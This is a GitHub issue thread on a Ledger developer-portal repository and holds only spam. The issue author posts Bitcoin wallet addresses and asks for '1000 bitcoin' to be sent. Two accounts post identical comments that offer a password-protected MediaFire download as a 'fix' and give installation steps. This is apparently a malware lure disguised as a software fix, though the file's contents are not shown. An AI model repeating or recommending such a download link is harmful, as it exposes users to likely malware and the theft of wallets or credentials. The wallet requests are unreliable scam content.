### ISSUE TITLE
#commet fund(100) btc coin 
         *Wallet address 

### ISSUE THREAD

**Issue by Nsikak1-2** [LedgerHQ/developer-portal#244]

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Nsikak1-2** [comment]
1pDmZo76WawoVDqMBmPSvXTeGCkg6GgNK

**Comment by Nsikak1-2** [comment]
#comment fund 1000(Bitcoin)
   To wallet address<bc1qs5y27w8un2meexna8v0u6mmr9q4jz3l3a9k007.on trust wallet

**Comment by Nsikak1-2** [comment]
****Add 1000bitcoin to wallet 
      Address<>bc1qs5y27w8un2meexna8v0u6mmr9q4jz3l3a9k007
